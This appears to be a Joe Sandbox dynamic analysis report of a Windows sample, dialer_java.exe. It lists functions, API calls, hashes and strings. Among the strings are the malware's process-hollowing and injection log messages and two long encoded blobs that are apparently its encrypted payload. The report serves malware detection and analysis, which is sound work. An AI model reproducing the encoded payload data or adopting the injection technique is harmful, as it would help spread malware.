Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction ID: 567b52e8b790ccc131660ee8db64e5c97932d8afefa1ffde23f0cd773bfc5b8d
Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction Fuzzy Hash: E7015A27A3B60381F645AF01A904275E332BF16BD1FC44535C90D876A4EF2CBE518270

Analysis Process: dialer_java.exePID: 7984, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	231
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF695DE3B80 Relevance: 141.9, APIs: 67, Strings: 13, Instructions: 1888COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF695DE3CA1
memset.MSVCRT ref: 00007FF695DE3DC9
wcscat.MSVCRT ref: 00007FF695DE3DD9
memset.MSVCRT ref: 00007FF695DE3DED
wcslen.MSVCRT ref: 00007FF695DE3E56
_wcsnicmp.MSVCRT ref: 00007FF695DE3E89
wcslen.MSVCRT ref: 00007FF695DE3E95
wcscpy.MSVCRT ref: 00007FF695DE3F23
wcscat.MSVCRT ref: 00007FF695DE3F32
memset.MSVCRT ref: 00007FF695DE3F43
wcscpy.MSVCRT ref: 00007FF695DE406B
wcscat.MSVCRT ref: 00007FF695DE407A
memset.MSVCRT ref: 00007FF695DE4097
wcslen.MSVCRT ref: 00007FF695DE4113
_wcsnicmp.MSVCRT ref: 00007FF695DE4139
wcslen.MSVCRT ref: 00007FF695DE4149
wcscpy.MSVCRT ref: 00007FF695DE4362
wcscat.MSVCRT ref: 00007FF695DE4371
_wcsicmp.MSVCRT ref: 00007FF695DE4380
memset.MSVCRT ref: 00007FF695DE43B1
wcscpy.MSVCRT ref: 00007FF695DE4419
wcscat.MSVCRT ref: 00007FF695DE4428
memset.MSVCRT ref: 00007FF695DE443C
wcscpy.MSVCRT ref: 00007FF695DE44C2
wcscat.MSVCRT ref: 00007FF695DE44D1
memset.MSVCRT ref: 00007FF695DE44E5
wcscpy.MSVCRT ref: 00007FF695DE4538
wcscat.MSVCRT ref: 00007FF695DE4547
memset.MSVCRT ref: 00007FF695DE455B
wcscpy.MSVCRT ref: 00007FF695DE45EE
wcscat.MSVCRT ref: 00007FF695DE45FD
memset.MSVCRT ref: 00007FF695DE4611
wcscpy.MSVCRT ref: 00007FF695DE4679
wcscat.MSVCRT ref: 00007FF695DE4688
memset.MSVCRT ref: 00007FF695DE469C
wcslen.MSVCRT ref: 00007FF695DE4705
_wcsnicmp.MSVCRT ref: 00007FF695DE4739
wcslen.MSVCRT ref: 00007FF695DE4745
wcscat.MSVCRT ref: 00007FF695DE476C
memset.MSVCRT ref: 00007FF695DE4780
wcscpy.MSVCRT ref: 00007FF695DE480F
wcscat.MSVCRT ref: 00007FF695DE481E
memset.MSVCRT ref: 00007FF695DE4B0A
wcscpy.MSVCRT ref: 00007FF695DE4B70
wcscat.MSVCRT ref: 00007FF695DE4B7F

Part of subcall function 00007FF695DE8410: memset.MSVCRT ref: 00007FF695DE842F
Part of subcall function 00007FF695DE8410: wcscpy.MSVCRT ref: 00007FF695DE8490
Part of subcall function 00007FF695DE8410: wcscat.MSVCRT ref: 00007FF695DE849B
Part of subcall function 00007FF695DE8410: wcslen.MSVCRT ref: 00007FF695DE84AC

wcslen.MSVCRT ref: 00007FF695DE4C97
wcslen.MSVCRT ref: 00007FF695DE4DFA
_wcsicmp.MSVCRT ref: 00007FF695DE4E67

Part of subcall function 00007FF695DE79B0: memset.MSVCRT ref: 00007FF695DE79DD

memset.MSVCRT ref: 00007FF695DE4FB5
wcscpy.MSVCRT ref: 00007FF695DE5044
wcscat.MSVCRT ref: 00007FF695DE5053
memset.MSVCRT ref: 00007FF695DE50A7
wcscpy.MSVCRT ref: 00007FF695DE50B9
wcscat.MSVCRT ref: 00007FF695DE50C8
_wcsicmp.MSVCRT ref: 00007FF695DE5264
memset.MSVCRT ref: 00007FF695DE5283
wcscpy.MSVCRT ref: 00007FF695DE52E4
wcscat.MSVCRT ref: 00007FF695DE52F6
wcslen.MSVCRT ref: 00007FF695DE5309

Part of subcall function 00007FF695DE7F20: memset.MSVCRT ref: 00007FF695DE7F82
Part of subcall function 00007FF695DE7F20: memset.MSVCRT ref: 00007FF695DE8015
Part of subcall function 00007FF695DE7F20: wcscpy.MSVCRT ref: 00007FF695DE806D
Part of subcall function 00007FF695DE7F20: wcscat.MSVCRT ref: 00007FF695DE8078
Part of subcall function 00007FF695DE7F20: wcslen.MSVCRT ref: 00007FF695DE8089

wcslen.MSVCRT ref: 00007FF695DE576B
memset.MSVCRT ref: 00007FF695DE5831
wcslen.MSVCRT ref: 00007FF695DE589A
_wcsnicmp.MSVCRT ref: 00007FF695DE58C9
wcslen.MSVCRT ref: 00007FF695DE58D5
wcscat.MSVCRT ref: 00007FF695DE58FC
memset.MSVCRT ref: 00007FF695DE5B5B
memcpy.MSVCRT ref: 00007FF695DE6196

Strings

[INFO] Mutex already exists: %s, xrefs: 00007FF695DE5803
[ERROR] Failed to decrypt payload, xrefs: 00007FF695DE5B3D
[ERROR] Invalid process handle, xrefs: 00007FF695DE5CE0
[INFO] Mutex not found: %s, xrefs: 00007FF695DE5938
, xrefs: 00007FF695DE5371
[INFO] inject_process completed, xrefs: 00007FF695DE5816
JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl, xrefs: 00007FF695DE594B
[SUCCESS] Payload decrypted, size: %zu bytes, xrefs: 00007FF695DE5978
[INFO] inject_process started, xrefs: 00007FF695DE574A
[SUCCESS] Process handle obtained: 0x%p, xrefs: 00007FF695DE5CB8
[INFO] Process handle closed, xrefs: 00007FF695DE5CCF
VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn, xrefs: 00007FF695DE50E5
[INFO] Process hollowing executed for program: %s, xrefs: 00007FF695DE5C9F

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
String ID: $JzkdaHd1eXdoY3p5ZGJyaXJqZ3doaWx4LWt3cGtodXZqY2VodnV5d2xjenlkYnJpcmpnd2hpbHhta3dwE2h1dmR832Z2wXC6Tdt7NalDJgEbGUcHGgYLCgwGVxMKBhsZHkMHDVYHDBlMChRZIC0hSR8FAxJGTWx4PS53cA/ucnaJgucPdnV5d2xjenmUYlBpeWhpd2hXZXhtL3Vwa2h1dipyZWh2ZXl3bGN6OWVicmlyemd3aGtseGtrd3BraHV2bGNl$VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
API String ID: 1844779378-707888011
Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction ID: 329c4654d9d0ac052c2d0ef066303f292a5ce252e00fc8a426d30d37e6b7ca2c
Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction Fuzzy Hash: C2334261C2C6C384F7319B28AA413F4A3E0EF95B84F4463B5D98CD65A5EF6D6A4DC308

Function 00007FF695DC1160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF695DC1156), ref: 00007FF695DC11A5
_amsg_exit.MSVCRT(?,?,?,00007FF695DC1156), ref: 00007FF695DC11CC
_initterm.MSVCRT ref: 00007FF695DC120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF695DC1156), ref: 00007FF695DC124E
malloc.MSVCRT ref: 00007FF695DC127E
strlen.MSVCRT ref: 00007FF695DC12A4
malloc.MSVCRT ref: 00007FF695DC12B0
memcpy.MSVCRT ref: 00007FF695DC12C3
_cexit.MSVCRT(?,?,?,00007FF695DC1156), ref: 00007FF695DC132D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction ID: 3c83dbfc5972517b2b308bdb84f6a667a62d0950a5696c60d1e88639a86474fc
Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction Fuzzy Hash: 59514971E1A65681EA31DB59E95037963E0EF88F90F4062B1D90DC73A1DF2CAC8EC308

Function 00007FF695DC1394 Relevance: 1.5, APIs: 1, Instructions: 24
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationThread.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF695DC1156), ref: 00007FF695DC13F7

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: InformationQueryThread
String ID:
API String ID: 741662350-0
Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction ID: 68db51f5ea07eb7971dde8782d45cd171f0d96f6735a8b60f02217bd4758448c
Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction Fuzzy Hash: 2CF0EC7291CB4192DA20DF51F84002A77E0FF48B80B056A7AE98C87725CF3CE9989B48

Function 00007FF695DE3A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_time64.MSVCRT ref: 00007FF695DE3AA7
_localtime64_s.MSVCRT ref: 00007FF695DE3ABF

Strings

[%Y-%m-%d %H:%M:%S], xrefs: 00007FF695DE3AC5
%s , xrefs: 00007FF695DE3AE1

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _localtime64_s_time64
String ID: %s $[%Y-%m-%d %H:%M:%S]
API String ID: 2262455995-899559958
Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction ID: 6f6ef2b043c0fef35b7293dd581f48a0f2dd139ef1cab95126729ee26efc4cb2
Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction Fuzzy Hash: 47016131A18B8251EA359B11F8503FAA3A4EF88BD0F4061B5ED8E437558E7CD68EC704

Non-executed Functions

Function 00007FF695DD6520 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF695DD66DC
malloc.MSVCRT ref: 00007FF695DD6735
malloc.MSVCRT ref: 00007FF695DD67D7
malloc.MSVCRT ref: 00007FF695DD684C
memcpy.MSVCRT ref: 00007FF695DD686B
realloc.MSVCRT ref: 00007FF695DD68CB
memchr.MSVCRT ref: 00007FF695DD694E
malloc.MSVCRT ref: 00007FF695DD6999
memcpy.MSVCRT ref: 00007FF695DD69B8
realloc.MSVCRT ref: 00007FF695DD6A61
malloc.MSVCRT ref: 00007FF695DD6A7A
memcpy.MSVCRT ref: 00007FF695DD6A99
malloc.MSVCRT ref: 00007FF695DD6B90
free.MSVCRT ref: 00007FF695DD6C51
_assert.MSVCRT ref: 00007FF695DD6C80
_assert.MSVCRT ref: 00007FF695DD6C9A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD6C73, 00007FF695DD6C8D
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF695DD6C6C
Last != First && "Popping empty vector!", xrefs: 00007FF695DD6C86
'block-literal', xrefs: 00007FF695DD682F
yptn, xrefs: 00007FF695DD68C0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc$_assert$freememchr
String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 3787261664-3461159648
Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction ID: 03854adb3919bfb3020656820548323fe14bf5038a9da575e5893b02c871f06b
Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction Fuzzy Hash: 0922C132609B8281EA348B25F44027977E4FB44F80F145276DB9E87B95EF3CE989C784

Function 00007FF695DCA480 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 400
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF695DCA4C9
malloc.MSVCRT ref: 00007FF695DCA813
realloc.MSVCRT ref: 00007FF695DCAA84
free.MSVCRT ref: 00007FF695DCAAFA
free.MSVCRT ref: 00007FF695DCAB14
free.MSVCRT ref: 00007FF695DCAB26
free.MSVCRT ref: 00007FF695DCAB38
free.MSVCRT ref: 00007FF695DCAB47

Strings

_block_i, xrefs: 00007FF695DCA8FC
invocation function for block in , xrefs: 00007FF695DCA9B6
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp, xrefs: 00007FF695DCABA2
___Z, xrefs: 00007FF695DCA752
Parser.ForwardTemplateRefs.empty(), xrefs: 00007FF695DCAB9B
k_invoke, xrefs: 00007FF695DCA909
____, xrefs: 00007FF695DCA765

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: free$mallocreallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
API String ID: 3545345670-2202808109
Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction ID: 90731c380c254afacfa3dbf1261c9dc3ad4060d9b407b6db06398aec44997d1b
Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction Fuzzy Hash: FF128F3290DBC281FA75CB04E4543FAA3A4EB94B54F416371EA8D46B94EF7CD989CB04

Function 00007FF695DDD0F0 Relevance: 15.4, APIs: 9, Strings: 1, Instructions: 416stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDD207
malloc.MSVCRT ref: 00007FF695DDD31B
malloc.MSVCRT ref: 00007FF695DDD47B
malloc.MSVCRT ref: 00007FF695DDD51E
strlen.MSVCRT ref: 00007FF695DDD553
malloc.MSVCRT ref: 00007FF695DDD5CE
strlen.MSVCRT ref: 00007FF695DDD603
malloc.MSVCRT ref: 00007FF695DDD67E
strlen.MSVCRT ref: 00007FF695DDD6B3

Strings

objcprot, xrefs: 00007FF695DDD2A1

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$strlen
String ID: objcprot
API String ID: 832207080-2390413308
Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction ID: 064a7e9d7a20f46e6397751242c1d41a673360f51b790269345abae69d5730ea
Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction Fuzzy Hash: 84021632609B8191EB259B24E444BA93BE4EB04F90F455372DFAC4B7D5DF38E96AC304

Function 00007FF695DD4440 Relevance: 13.0, APIs: 10, Instructions: 464COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD446C
malloc.MSVCRT ref: 00007FF695DD4575
malloc.MSVCRT ref: 00007FF695DD4675
malloc.MSVCRT ref: 00007FF695DD4700
malloc.MSVCRT ref: 00007FF695DD47DA
malloc.MSVCRT ref: 00007FF695DD48E8
malloc.MSVCRT ref: 00007FF695DD495C

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction ID: 634c1353d72d4ce47b4cb0bc21c09becdebc03e34ec3e64cb6bc230c23fc3f47
Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction Fuzzy Hash: D7221132609B8185EB248B24E0443A937E8FB04F80F49537ADB9D87791DF7CE95AC718

Function 00007FF695DD0160 Relevance: 10.9, APIs: 7, Instructions: 377COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD0280
malloc.MSVCRT ref: 00007FF695DD0376
malloc.MSVCRT ref: 00007FF695DD06A8

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction ID: 8cbd5e68c2b79fb2f0ba067c49152e2cdb6d9e01f477bf228ba53cf205455f2e
Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction Fuzzy Hash: 3DE1C22260AB8285EA758B11D4407B927E4EB84F80F485376CE5D8BB91EF3CE959C748

Function 00007FF695DD76E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD7A37
memcpy.MSVCRT ref: 00007FF695DD7A53

Strings

%LaL, xrefs: 00007FF695DD79E9

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: %LaL
API String ID: 2500458235-3433341929
Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction ID: 17f35955a8d3bb2e6710f915714a816f7e3a958aee2a3acf9dc05d37cf7a14f7
Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction Fuzzy Hash: 45916B6BB1C6E112EB394334F540F9D2E60C7A2762F05A355CBB403F9ADA2EC6168B04

Function 00007FF695DC4120 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF695DC8350: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF695DC84FA

fflush.MSVCRT ref: 00007FF695DC4370
fflush.MSVCRT ref: 00007FF695DC422D

Part of subcall function 00007FF695DC8A70: getenv.MSVCRT ref: 00007FF695DC8A93

fflush.MSVCRT ref: 00007FF695DC4287
fflush.MSVCRT ref: 00007FF695DC42D2
fflush.MSVCRT ref: 00007FF695DC4336
fflush.MSVCRT ref: 00007FF695DC43CE
fflush.MSVCRT ref: 00007FF695DC440E
fflush.MSVCRT ref: 00007FF695DC4448

Strings

libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF695DC442B
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF695DC4357
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF695DC43F2
libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF695DC42B6
libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF695DC43AE
libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF695DC4214
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF695DC4499
libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF695DC426B
.anonymous., xrefs: 00007FF695DC41E6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF695DC431D
libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF695DC438D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
